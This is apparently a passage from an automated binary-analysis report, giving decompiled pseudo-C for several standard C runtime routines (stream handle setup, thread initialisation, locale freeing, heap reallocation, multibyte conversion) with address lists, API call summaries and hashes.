							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x10c1a80;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -17562900
											E01062D36(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E0106207A();
						_t86 = 0;
						L49:
						return E01062835(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0x10c1b28 < _t135) {
						_t138 = E010632EE(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0x10bfd20[_t149] = _t138;
							 *0x10c1b28 =  *0x10c1b28 + _t141;
							while(_t138 <  &(0x10bfd20[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x10c1b28;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0x10bfd20[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E01062D36(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E01064E90(_t155, 0x107ece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                        0x01061dcf
                                        0x01061dd1
                                        0x01061dd6
                                        0x01061ddd
                                        0x01061de5
                                        0x01061de8
                                        0x01061dec
                                        0x01061ded
                                        0x01061dee
                                        0x01061df5
                                        0x01061df7
                                        0x01061dfc
                                        0x01061e19
                                        0x01061e1e
                                        0x01061e24
                                        0x01061e2d
                                        0x01061e33
                                        0x01061e36
                                        0x01061e39
                                        0x01061e42
                                        0x01061e45
                                        0x01061e4b
                                        0x01061e4e
                                        0x01061e51
                                        0x01061e54
                                        0x01061e57
                                        0x01061e57
                                        0x01061e62
                                        0x01061e6d
                                        0x01061fa2
                                        0x01061fa4
                                        0x01061fa5
                                        0x01061fa5
                                        0x01061fa7
                                        0x01061fa7
                                        0x01061fad
                                        0x00000000
                                        0x00000000
                                        0x01061fb8
                                        0x01061fbe
                                        0x01061fc4
                                        0x01061fd8
                                        0x01061fde
                                        0x01061fe5
                                        0x01061fea
                                        0x01061fec
                                        0x01061fe0
                                        0x01061fe2
                                        0x01061fe2
                                        0x01061ff0
                                        0x01061ff6
                                        0x01061ffc
                                        0x0106204a
                                        0x01062050
                                        0x01062053
                                        0x01062055
                                        0x0106205c
                                        0x01062061
                                        0x01062061
                                        0x00000000
                                        0x01062002
                                        0x01062003
                                        0x0106200b
                                        0x00000000
                                        0x00000000
                                        0x01062010
                                        0x01062012
                                        0x0106201a
                                        0x01062027
                                        0x01062032
                                        0x01062039
                                        0x0106203d
                                        0x01062042
                                        0x01062045
                                        0x00000000
                                        0x01062045
                                        0x0106202d
                                        0x0106202f
                                        0x0106202f
                                        0x00000000
                                        0x0106202f
                                        0x01062020
                                        0x00000000
                                        0x01062020
                                        0x01061fca
                                        0x01061fd0
                                        0x01062064
                                        0x01062064
                                        0x00000000
                                        0x01062064
                                        0x01061fc4
                                        0x0106206a
                                        0x0106206d
                                        0x01062072
                                        0x01062074
                                        0x01062079
                                        0x01062079
                                        0x01061e73
                                        0x01061e78
                                        0x00000000
                                        0x00000000
                                        0x01061e7e
                                        0x01061e80
                                        0x01061e83
                                        0x01061e86
                                        0x01061e8b
                                        0x01061e95
                                        0x01061e97
                                        0x01061e99
                                        0x01061e99
                                        0x01061e9e
                                        0x01061e9f
                                        0x01061ea2
                                        0x01061eb4
                                        0x01061eb6
                                        0x01061ebb
                                        0x01061f55
                                        0x01061f5c
                                        0x01061f62
                                        0x01061f72
                                        0x01061f78
                                        0x01061f7b
                                        0x01061f7e
                                        0x01061f82
                                        0x01061f88
                                        0x01061f8b
                                        0x01061f8e
                                        0x01061f91
                                        0x01061f91
                                        0x01061f96
                                        0x01061f97
                                        0x01061f9a
                                        0x00000000
                                        0x01061f9a
                                        0x01061ec1
                                        0x01061ec7
                                        0x00000000
                                        0x01061ec7
                                        0x01061eca
                                        0x01061ecc
                                        0x01061ed1
                                        0x01061ed2
                                        0x01061ed5
                                        0x01061ed8
                                        0x01061ee0
                                        0x01061ee5
                                        0x01061f42
                                        0x01061f42
                                        0x01061f43
                                        0x01061f49
                                        0x01061f4a
                                        0x01061f4d
                                        0x01061f50
                                        0x00000000
                                        0x01061eeb
                                        0x01061eeb
                                        0x01061eef
                                        0x00000000
                                        0x00000000
                                        0x01061ef3
                                        0x01061f03
                                        0x01061f10
                                        0x01061f17
                                        0x01061f1c
                                        0x01061f23
                                        0x01061f2d
                                        0x01061f31
                                        0x01061f36
                                        0x01061f39
                                        0x01061f3c
                                        0x01061f3f
                                        0x01061f3f
                                        0x00000000
                                        0x01061f3f
                                        0x01061ef6
                                        0x01061efc
                                        0x01061f01
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01061f01
                                        0x01061ee5
                                        0x00000000
                                        0x01061ed8
                                        0x01061e11
                                        0x00000000

                                        APIs
                                        • __lock.LIBCMT ref: 01061DDD
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • __calloc_crt.LIBCMT ref: 01061DEE
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 01061E09
                                        • GetStartupInfoW.KERNEL32(?,0107CD50,00000064,01061146,0107CCC0,00000014), ref: 01061E62
                                        • __calloc_crt.LIBCMT ref: 01061EAD
                                        • GetFileType.KERNEL32(00000001), ref: 01061EF6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction ID: 4220f4b57403b46eff6df1509059b8c0391ed9c9b4e7ec4f1c3e11ebc24afd61
                                        • Opcode Fuzzy Hash: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction Fuzzy Hash: 1F81B371D04246CFDB24CF68C8405ADBBF9BF59320B2442AEE4E6AB391D7399802CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061738, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E01061738(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E01061BC7(_t3);
				if(E01063268() != 0) {
					_t6 = E01062BEF(E01061493);
					 *0x107e000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E010632EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E010617AE();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E01062C4B( *0x107e000, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E01061685(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E010617AE();
					return 0;
				}
			}








                                        0x01061738
                                        0x01061744
                                        0x01061753
                                        0x01061758
                                        0x0106175e
                                        0x01061761
                                        0x00000000
                                        0x01061763
                                        0x01061770
                                        0x01061774
                                        0x01061776
                                        0x010617a5
                                        0x010617a5
                                        0x010617aa
                                        0x010617ad
                                        0x01061778
                                        0x01061786
                                        0x01061788
                                        0x00000000
                                        0x0106178a
                                        0x0106178a
                                        0x0106178c
                                        0x0106178d
                                        0x01061794
                                        0x0106179a
                                        0x0106179e
                                        0x010617a2
                                        0x010617a4
                                        0x010617a4
                                        0x01061788
                                        0x01061776
                                        0x01061746
                                        0x01061746
                                        0x01061746
                                        0x0106174d
                                        0x0106174d

                                        APIs
                                        • __init_pointers.LIBCMT ref: 01061738
                                          • Part of subcall function 01061BC7: EncodePointer.KERNEL32(00000000,?,0106173D,0106112C,0107CCC0,00000014), ref: 01061BCA
                                          • Part of subcall function 01061BC7: __initp_misc_winsig.LIBCMT ref: 01061BE5
                                          • Part of subcall function 01061BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01062DAE
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01062DC2
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01062DD5
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01062DE8
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01062DFB
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01062E0E
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01062E21
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01062E34
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01062E47
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01062E5A
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01062E6D
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01062E80
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01062E93
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01062EA6
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01062EB9
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01062ECC
                                        • __mtinitlocks.LIBCMT ref: 0106173D
                                        • __mtterm.LIBCMT ref: 01061746
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 01063182
                                          • Part of subcall function 010617AE: _free.LIBCMT ref: 01063189
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(0107E058,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 010631AB
                                        • __calloc_crt.LIBCMT ref: 0106176B
                                        • __initptd.LIBCMT ref: 0106178D
                                        • GetCurrentThreadId.KERNEL32(0106112C,0107CCC0,00000014), ref: 01061794
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        • Opcode ID: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction ID: 11304d4fe9ea5885aab4587ac3a0492065e43b777ef5c1896b8c4a878036415c
                                        • Opcode Fuzzy Hash: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction Fuzzy Hash: ADF09032A197131DF2757A79BC0A7CE2AECBF92630B204A6AF4D4D90C4FF3984418294
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106879C, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0106879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				signed int _t12;
				intOrPtr* _t16;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x107cf60);
				_t10 = E010627F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					_t12 = E01063117(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *((intOrPtr*)(_t31 + 4)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x107e5b0) {
							E010632B6( *((intOrPtr*)(_t31 + 4)));
						}
					}
					 *(_t32 - 4) = 0xfffffffe;
					E01068DC1();
					if( *_t31 != 0) {
						E01063117(0xc);
						 *(_t32 - 4) = 1;
						E0106363B( *_t31);
						_t16 =  *_t31;
						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x107e2e8) {
							E010634E1(_t16);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E01068DCD();
					}
					_t10 = E010632B6(_t31);
				}
				return E01062835(_t10);
			}








                                        0x01068d1f
                                        0x01068d21
                                        0x01068d26
                                        0x01068d2b
                                        0x01068d30
                                        0x01068d38
                                        0x01068d3e
                                        0x01068d47
                                        0x01068d4c
                                        0x01068d50
                                        0x01068d5e
                                        0x01068d63
                                        0x01068d50
                                        0x01068d64
                                        0x01068d6b
                                        0x01068d73
                                        0x01068d77
                                        0x01068d7d
                                        0x01068d86
                                        0x01068d8c
                                        0x01068d90
                                        0x01068d9f
                                        0x01068da4
                                        0x01068da5
                                        0x01068dac
                                        0x01068dac
                                        0x01068db2
                                        0x01068db7
                                        0x01068dbd

                                        APIs
                                        • __lock.LIBCMT ref: 01068D38
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • _free.LIBCMT ref: 01068D5E
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • __lock.LIBCMT ref: 01068D77
                                        • ___removelocaleref.LIBCMT ref: 01068D86
                                        • ___freetlocinfo.LIBCMT ref: 01068D9F
                                        • _free.LIBCMT ref: 01068DB2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction ID: 205b0c7eafba4a618c5dd71e5056d29ef6abffd32cd48716cb0339ad8747cd66
                                        • Opcode Fuzzy Hash: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction Fuzzy Hash: A7019231542706DAEBB9BB68D844798B7EC6F30721F24858EE5E86E1D0DF748580C664
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010659FE, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E010659FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x10bfd1c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x10c0a40 - _t7;
								if(__eflags == 0) {
									_t9 = E01064196(__eflags);
									 *_t9 = E010641EF(GetLastError());
									goto L17;
								} else {
									__eflags = E0106455B(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E01064196(__eflags);
										 *_t12 = E010641EF(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0106455B(_t6, _t31);
						 *((intOrPtr*)(E01064196(__eflags))) = 0xc;
						goto L12;
					} else {
						E010632B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0106596C(__ebx, __edx, __edi, _a8);
				}
			}









                                        0x01065a05
                                        0x01065a13
                                        0x01065a16
                                        0x01065a18
                                        0x01065a27
                                        0x01065a5a
                                        0x01065a5a
                                        0x01065a5d
                                        0x00000000
                                        0x00000000
                                        0x01065a2a
                                        0x01065a2c
                                        0x01065a2e
                                        0x01065a2e
                                        0x01065a2e
                                        0x01065a3b
                                        0x01065a41
                                        0x01065a43
                                        0x01065a45
                                        0x01065aa5
                                        0x01065aa5
                                        0x01065a47
                                        0x01065a47
                                        0x01065a4d
                                        0x01065a8f
                                        0x01065aa3
                                        0x00000000
                                        0x01065a4f
                                        0x01065a56
                                        0x01065a58
                                        0x01065a77
                                        0x01065a8b
                                        0x01065a71
                                        0x01065a71
                                        0x01065a71
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01065a58
                                        0x01065a4d
                                        0x00000000
                                        0x01065a73
                                        0x01065a60
                                        0x01065a6b
                                        0x00000000
                                        0x01065a1a
                                        0x01065a1d
                                        0x01065a23
                                        0x01065a23
                                        0x01065a74
                                        0x01065a76
                                        0x01065a07
                                        0x01065a11
                                        0x01065a11

                                        APIs
                                        • _malloc.LIBCMT ref: 01065A0A
                                          • Part of subcall function 0106596C: __FF_MSGBANNER.LIBCMT ref: 01065983
                                          • Part of subcall function 0106596C: __NMSG_WRITE.LIBCMT ref: 0106598A
                                          • Part of subcall function 0106596C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,0106334C,00000000,00000000,00000000,00000000,?,01063201,00000018,0107CDB0), ref: 010659AF
                                        • _free.LIBCMT ref: 01065A1D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction ID: f78d5f34113f0e61f70c23818527253ab988fdacd78ea6edbdeb71e0048968f4
                                        • Opcode Fuzzy Hash: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction Fuzzy Hash: BE118636504716EFDB717F78AC846AD3BDC9F242A0F104566F9D9DA141EB3589408790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106F3F6, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E010637C4( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0106F121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E01064196(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                        0x0106f3fe
                                        0x0106f403
                                        0x0106f41d
                                        0x00000000
                                        0x0106f41d
                                        0x0106f405
                                        0x0106f40a
                                        0x00000000
                                        0x00000000
                                        0x0106f40f
                                        0x0106f42c
                                        0x0106f431
                                        0x0106f434
                                        0x0106f43b
                                        0x0106f45a
                                        0x0106f461
                                        0x0106f463
                                        0x0106f4a7
                                        0x0106f4b6
                                        0x0106f4c4
                                        0x0106f4c6
                                        0x0106f4d6
                                        0x0106f4d6
                                        0x0106f4da
                                        0x0106f4dc
                                        0x0106f4df
                                        0x0106f4df
                                        0x0106f4df
                                        0x0106f4df
                                        0x00000000
                                        0x0106f4e5
                                        0x0106f4c8
                                        0x0106f4c8
                                        0x0106f4cd
                                        0x0106f4cd
                                        0x0106f4d0
                                        0x00000000
                                        0x0106f4d0
                                        0x0106f465
                                        0x0106f468
                                        0x0106f46c
                                        0x0106f495
                                        0x0106f495
                                        0x0106f498
                                        0x0106f498
                                        0x00000000
                                        0x00000000
                                        0x0106f49a
                                        0x0106f49e
                                        0x00000000
                                        0x00000000
                                        0x0106f4a0
                                        0x0106f4a0
                                        0x00000000
                                        0x0106f4a0
                                        0x0106f46e
                                        0x0106f471
                                        0x00000000
                                        0x00000000
                                        0x0106f475
                                        0x0106f488
                                        0x0106f48e
                                        0x0106f491
                                        0x0106f493
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106f493
                                        0x0106f43d
                                        0x0106f440
                                        0x0106f442
                                        0x0106f447
                                        0x0106f447
                                        0x0106f44c
                                        0x00000000
                                        0x0106f44c
                                        0x0106f411
                                        0x0106f416
                                        0x0106f41a
                                        0x0106f41a
                                        0x00000000

                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0106F42C
                                        • __isleadbyte_l.LIBCMT ref: 0106F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F4BE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction ID: 9cae400fde65ca157654dee80779df27549578146d198d94eca8352c2391c763
                                        • Opcode Fuzzy Hash: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction Fuzzy Hash: 3531C330600247AFDB22CE28E854BBA7FF9FF41220F154169E8A497590DB30D850CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01072F81, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
